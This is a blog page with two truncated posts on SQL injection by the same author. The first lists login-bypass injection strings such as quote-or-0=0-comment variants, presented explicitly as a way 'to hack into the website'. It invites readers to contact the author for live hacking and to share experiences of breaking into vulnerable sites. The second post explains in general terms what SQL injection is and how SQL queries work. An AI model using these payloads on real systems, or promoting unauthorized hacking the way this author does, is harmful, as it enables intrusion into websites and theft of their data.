Posted by Vikash Dhankar on December 24, 2009 ·
Here I am posting some of the SQL injection strings that you can use to hack into the website.
I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.
If someone is pro of breaking into venerable systems and sites. please share your expriences/
‘ or 0=0 –
‘ or 0=0 –’
‘ or 0=0 #
” or 0=0 –
” or 0=0 –’
‘” [...]
Posted by Vikash Dhankar on March 22, 2009 ·
SQL injection attacks are based on injecting strings into database queries that alter their intended use. This can occur if a web application does not properly filter user input.
There are many varieties of SQL. Most dialects are loosely based on the most recent ANSI standard SQL-92. The typical unit of execution in the SQL language is the query, a collection of statements that are aimed at retrieving data from or manipulating records in the database. [...]